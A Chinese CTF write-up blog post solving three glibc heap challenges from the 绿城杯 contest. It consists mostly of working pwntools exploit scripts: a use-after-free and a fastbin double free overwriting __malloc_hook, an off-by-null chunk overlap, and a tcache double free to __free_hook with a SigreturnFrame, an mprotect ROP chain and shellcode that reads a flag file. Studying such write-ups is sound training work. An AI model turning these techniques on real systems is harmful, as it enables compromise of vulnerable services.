绿城杯pwn1-3

=-=,不想评价这次的绿城,打过的话懂得都懂yue

uaf

1
2
3
4
5
void __fastcall sub_AC5(__int64 a1, int a2)
{
if ( *(_QWORD *)(8LL * a2 + a1) )
free(*(void **)(8LL * a2 + a1));
}

=-=uaf泄露libc直接打malloc

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *
context.log_level = 'debug'

def add(size):
p.sendlineafter(">",str(1))
p.sendlineafter(">",str(size))
def delete(id):
p.sendlineafter(">",str(2))
p.sendlineafter(">",str(id))
def edit(id,content):
p.sendlineafter(">",str(3))
p.sendlineafter(">",str(id))
p.sendafter(">",content)
def show(id):
p.sendlineafter(">",str(4))
p.sendlineafter(">",str(id))

p = process("./uaf_pwn")
#p = remote("82.157.5.28",50702)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
chunk_list = int(p.recv(14),16)
print "chunk_list:",hex(chunk_list)
add(0xf8)
add(0xf8)
delete(0)
add(0xf8)
show(0)
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - (0x7ffff7dd1b78-0x7ffff7a0d000)
print "libc_base:",hex(libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']-0x23
print "malloc_hook:",hex(malloc_hook)

for i in range(3):
add(0x68)
delete(3)
delete(4)
delete(3)

add(0x68)
edit(6,p64(malloc_hook))
add(0x68)
edit(7,p64(malloc_hook))
add(0x68)
edit(8,p64(malloc_hook))
add(0x68) #9
edit(9,'\x00'*0x13+p64(libc_base+0x4527a))

p.sendlineafter(">",str(1))
p.sendlineafter(">",str(0x68))


p.interactive()

null

off by one漏洞,直接当off bu null打就完事了,构造chunk overlap控制指针。

1
2
3
4
5
6
7
8
9
10
11
12
ssize_t __fastcall read_input(void *a1, __int64 a2)
{
ssize_t result; // rax

result = read(0, a1, a2 + 1);
if ( (int)result <= 0 )
{
puts("Error");
exit(0);
}
return result;
}

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwn import *
context.log_level = 'debug'

def add(id,size,content):
p.sendlineafter(":",str(1))
p.sendlineafter("Index:",str(id))
p.sendlineafter("Heap :",str(size))
p.sendafter("?:",content)
def delete(id):
p.sendlineafter(":",str(2))
p.sendlineafter("Index:",str(id))
def edit(id,content):
p.sendlineafter(":",str(3))
p.sendlineafter("Index:",str(id))
p.sendafter("?:",content)
def show(id):
p.sendlineafter(":",str(4))
p.sendlineafter("Index :",str(id))



p = process("./null_pwn")
#p = remote("82.157.5.28",50804)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


add(0,0xf8,'a')
add(1,0x68,'a')
add(2,0xf8,'a')
add(3,0x68,'a') #protect

delete(0)
#gdb.attach(p)

add(0,0xf8,'\x78')
#gdb.attach(p)

show(0)
p.recvuntil("Content : ")
leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - (0x7fc7c3689b78-0x7fc7c32c5000)
print "libc_base:",hex(libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']-0x23
print "malloc_hook:",hex(malloc_hook)

delete(0)
edit(1,'a'*0x60+p64(0x170)+'\x00')
gdb.attach(p)
delete(2)
gdb.attach(p)
add(0,0xf8,'a')
add(2,0x68,'a') #1
add(4,0xf8,'a')

delete(1)
delete(3)
delete(2)

add(1,0x68,p64(malloc_hook))
add(2,0x68,p64(malloc_hook))
add(3,0x68,p64(malloc_hook))
add(5,0x68,'\x00'*0x13+p64(libc_base+0xf1247))

p.sendlineafter(":",str(1))
p.sendlineafter("Index:",str(9))
p.sendlineafter("Heap :",str(0x68))

p.interactive()

greentownnote

什么牛马缝合怪。。。。无聊题 uaf 问题开了沙盒,通用打法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
unsigned __int64 sub_D19()
{
int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
printf("| Index :");
__isoc99_scanf("%d", &v1);
if ( v1 < 0 || v1 >= dword_20203C )
exit(0);
qword_202040 = (__int64)&unk_202060 + 16 * v1;
free(*(void **)(qword_202040 + 8));
*(_DWORD *)qword_202040 = 0;
puts("| Success");
return __readfsqword(0x28u) ^ v2;
}

可以看见对free的idx没做检测的都不确认下heaparry是不是有东西的

直接double free 他的2.27是很老的那种直接double 就行了,我的本机2.29笑死。

double控制free_hook写入setcontext+53再去传入mprotect的构造就行了

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from pwn import*

ip = "82.157.5.28"
port = 50601
r = remote(ip,port)
elf = ELF('./GreentownNote')
libc = ELF('./libc-2.27.so')
context(os='linux',arch='amd64')


def choice(c):
r.recvuntil(":")
r.sendline(str(c))

def add(size,content):
choice(1)
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)

def show(index):
choice(2)
r.recvuntil(":")
r.sendline(str(index))

def free(index):
choice(3)
r.recvuntil(":")
r.sendline(str(index))



add(0x100,b'AAAA')#0
add(0x100,b'')#1

free(0)
free(0)
show(0)

r.recvuntil("Content: ")
leak = u64(r.recv(6).ljust(8,b'\x00'))
heap_addr = leak - 0x260
success(hex(heap_addr))

add(0x100,p64(heap_addr+0x10))#0
add(0x100,'AAA')#2
add(0x100,'\x07'*0x40)#3-》0

free(3)
show(3)
leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 96 - 0x10 - libc.sym['__malloc_hook']
fh = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
setcontext = libc.sym['setcontext'] + libc_base +53
syscall = next(libc.search(asm("syscall\nret")))+libc_base
success(hex(leak))
success(hex(libc_base))
add(0x100,b'\x07'*0x80+p64(fh))
add(0x90,p64(setcontext))

fake_rsp = fh&0xfffffffffffff000
print(hex(fake_rsp))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=fake_rsp
frame.rdx=0x2000
frame.rsp=fake_rsp
frame.rip=syscall
print(len(frame))
add(0xf8,str(frame))
free(5)
prdi_ret = libc_base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = libc_base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = libc_base+libc.search(asm("pop rdx\nret")).next()
prax_ret = libc_base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = libc_base+libc.search(asm("jmp rsp")).next()
mprotect_addr = libc_base + libc.sym['mprotect']


payload = p64(prdi_ret)+p64(fake_rsp)
payload += p64(prsi_ret)+p64(0x1000)
payload += p64(prdx_ret)+p64(7)
payload += p64(prax_ret)+p64(10)
payload += p64(syscall) #mprotect(fake_rsp,0x1000,7)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('./flag'))
payload += asm(shellcraft.read(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
r.sendline(payload)

r.interactive()


  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2022 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信